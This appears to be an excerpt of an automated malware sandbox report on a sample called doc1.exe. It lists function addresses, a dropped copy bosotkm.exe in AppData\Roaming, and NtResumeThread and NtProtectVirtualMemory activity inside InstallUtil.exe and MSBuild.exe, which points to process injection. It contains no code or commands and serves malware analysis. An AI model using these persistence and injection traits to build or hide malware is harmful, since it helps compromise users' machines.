                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FD5A0 NtResumeThread,1_2_057FD5A0
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FC0A8 NtProtectVirtualMemory,1_2_057FC0A8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FD598 NtResumeThread,1_2_057FD598
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FD68F NtResumeThread,1_2_057FD68F
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FC1C8 NtProtectVirtualMemory,1_2_057FC1C8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FC0A0 NtProtectVirtualMemory,1_2_057FC0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3D5A0 NtResumeThread,11_2_05E3D5A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3C0A8 NtProtectVirtualMemory,11_2_05E3C0A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3D598 NtResumeThread,11_2_05E3D598
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3D550 NtResumeThread,11_2_05E3D550
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3C0A0 NtProtectVirtualMemory,11_2_05E3C0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BD5A0 NtResumeThread,18_2_060BD5A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BC0A8 NtProtectVirtualMemory,18_2_060BC0A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BD598 NtResumeThread,18_2_060BD598
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BC0A0 NtProtectVirtualMemory,18_2_060BC0A0
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_010663321_2_01066332
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_010663401_2_01066340
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_010658E11_2_010658E1
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_010658F01_2_010658F0
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_01069AC81_2_01069AC8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0576EC381_2_0576EC38
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057669881_2_05766988
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0576C5B61_2_0576C5B6
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057654A01_2_057654A0
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057654921_2_05765492
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_05766F681_2_05766F68
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0576697A1_2_0576697A
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057600401_2_05760040
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057600071_2_05760007
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0576FA901_2_0576FA90
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0576FA811_2_0576FA81
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057E05571_2_057E0557
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057E3BC81_2_057E3BC8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057E17701_2_057E1770
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057E088F1_2_057E088F
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F04701_2_057F0470
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F70601_2_057F7060
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FF8431_2_057FF843
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F92501_2_057F9250
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F86901_2_057F8690
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F86801_2_057F8680
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057FB1A01_2_057FB1A0
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F704F1_2_057F704F
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057F92411_2_057F9241
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058000071_2_05800007
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0580E8101_2_0580E810
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058000401_2_05800040
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058104181_2_05810418
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058178381_2_05817838
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_05819B901_2_05819B90
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058104BB1_2_058104BB
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0581E4D91_2_0581E4D9
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0581E4E81_2_0581E4E8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058104081_2_05810408
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058109101_2_05810910
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0581093A1_2_0581093A
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058110E91_2_058110E9
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058110F81_2_058110F8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058178281_2_05817828
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_05819B811_2_05819B81
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058113391_2_05811339
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_058112A81_2_058112A8
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_05A800061_2_05A80006
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_05A800401_2_05A80040
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_05A9CE981_2_05A9CE98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDC0804_2_00DDC080
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD61204_2_00DD6120
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDB3384_2_00DDB338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDE4414_2_00DDE441
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD46D94_2_00DD46D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD97F84_2_00DD97F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDB7E34_2_00DDB7E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDF7884_2_00DDF788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD67484_2_00DD6748
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDC7614_2_00DDC761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDBAC04_2_00DDBAC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDCA414_2_00DDCA41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDBDA04_2_00DDBDA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD35704_2_00DD3570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDB5034_2_00DDB503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDD7F04_2_00DDD7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DDD8004_2_00DDD800
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01639AC811_2_01639AC8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016361E811_2_016361E8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_0163634011_2_01636340
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016358E111_2_016358E1
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016358F011_2_016358F0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DAEC3811_2_05DAEC38
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA698811_2_05DA6988
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DAC5B611_2_05DAC5B6
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA549311_2_05DA5493
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA54A011_2_05DA54A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA6F6811_2_05DA6F68
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA697911_2_05DA6979
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA004011_2_05DA0040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DA000711_2_05DA0007
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DAFA9011_2_05DAFA90
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05DAFA8111_2_05DAFA81
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E2055711_2_05E20557
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E2177011_2_05E21770
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E2088F11_2_05E2088F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E306B811_2_05E306B8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3706011_2_05E37060
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3F84311_2_05E3F843
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3925011_2_05E39250
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3479111_2_05E34791
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3868011_2_05E38680
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3869011_2_05E38690
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3B1A011_2_05E3B1A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3C0A011_2_05E3C0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3704F11_2_05E3704F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3924111_2_05E39241
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E4004011_2_05E40040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E4E81011_2_05E4E810
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E4001311_2_05E40013
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5041811_2_05E50418
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5805011_2_05E58050
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E504BB11_2_05E504BB
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5040A11_2_05E5040A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5C9A011_2_05E5C9A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5C9B011_2_05E5C9B0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5093A11_2_05E5093A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5091011_2_05E50910
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E510E911_2_05E510E9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E510F811_2_05E510F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5804111_2_05E58041
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5133911_2_05E51339
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E512A811_2_05E512A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_060DCE9811_2_060DCE98
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_060C000611_2_060C0006
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_060C004011_2_060C0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0103DD2412_2_0103DD24
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_01749AC818_2_01749AC8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_017461E818_2_017461E8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0174634018_2_01746340
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_017458F018_2_017458F0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_017458E118_2_017458E1
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602EC3818_2_0602EC38
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602698818_2_06026988
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_06026F6818_2_06026F68
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602549218_2_06025492
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060254A018_2_060254A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602C5B618_2_0602C5B6
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602FA8118_2_0602FA81
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602FA9018_2_0602FA90
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602000618_2_06020006
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602004018_2_06020040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602697918_2_06026979
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060A055718_2_060A0557
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060A177018_2_060A1770
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060A088F18_2_060A088F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B06B818_2_060B06B8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B925018_2_060B9250
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BF84318_2_060BF843
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B706018_2_060B7060
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B868018_2_060B8680
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B869018_2_060B8690
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B479118_2_060B4791
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B924118_2_060B9241
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B704F18_2_060B704F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BC0A018_2_060BC0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BB1A018_2_060BB1A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060C001E18_2_060C001E
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060CE81018_2_060CE810
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060C004018_2_060C0040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D041818_2_060D0418
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D805018_2_060D8050
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D040B18_2_060D040B
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D04BB18_2_060D04BB
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D12A818_2_060D12A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D133918_2_060D1339
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D804118_2_060D8041
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D10E918_2_060D10E9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D10F818_2_060D10F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D091018_2_060D0910
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D093A18_2_060D093A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060DC9A018_2_060DC9A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060DC9B018_2_060DC9B0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0635CE9818_2_0635CE98
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0634001A18_2_0634001A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0634004018_2_06340040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0B32821_2_02A0B328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0C19021_2_02A0C190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0610821_2_02A06108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0F77821_2_02A0F778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0C75321_2_02A0C753
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0E43121_2_02A0E431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0C47021_2_02A0C470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A04AD921_2_02A04AD9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0CA3321_2_02A0CA33
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0688021_2_02A06880
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0985821_2_02A09858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0BEB021_2_02A0BEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0D7E021_2_02A0D7E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0D7F021_2_02A0D7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0357321_2_02A03573
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577758821_2_05777588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05777E7821_2_05777E78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D1C021_2_0577D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F8D821_2_0577F8D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577328821_2_05773288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05777D7E21_2_05777D7E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05770D6021_2_05770D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577CD6821_2_0577CD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05770D5021_2_05770D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577CD5821_2_0577CD58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05776DF721_2_05776DF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F47121_2_0577F471
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577BC0821_2_0577BC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C4B821_2_0577C4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_057704A021_2_057704A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C4A821_2_0577C4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577049121_2_05770491
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F48021_2_0577F480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E77821_2_0577E778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E76821_2_0577E768
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577AF0021_2_0577AF00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B7B021_2_0577B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B7A021_2_0577B7A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_057777A821_2_057777A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D61821_2_0577D618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05776E0021_2_05776E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D60921_2_0577D609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577AEEF21_2_0577AEEF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DEC821_2_0577DEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DEB821_2_0577DEB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C91021_2_0577C910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C90321_2_0577C903
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577090021_2_05770900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D1B021_2_0577D1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C06021_2_0577C060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C05021_2_0577C050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577004021_2_05770040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F02821_2_0577F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F01821_2_0577F018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577000721_2_05770007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_057708F021_2_057708F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F8C921_2_0577F8C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B35821_2_0577B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B34821_2_0577B348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E32021_2_0577E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E31021_2_0577E310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577BBF821_2_0577BBF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577EBD021_2_0577EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577EBC121_2_0577EBC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DA7021_2_0577DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577327821_2_05773278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DA6321_2_0577DA63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665A60021_2_0665A600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665BF3021_2_0665BF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06659FB021_2_06659FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665AC4821_2_0665AC48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665745021_2_06657450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06650D4821_2_06650D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066585B021_2_066585B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665C58021_2_0665C580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665D21821_2_0665D218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B29021_2_0665B290
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06658BF921_2_06658BF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665CBD021_2_0665CBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B8E021_2_0665B8E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655E6021_2_06655E60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655E7021_2_06655E70
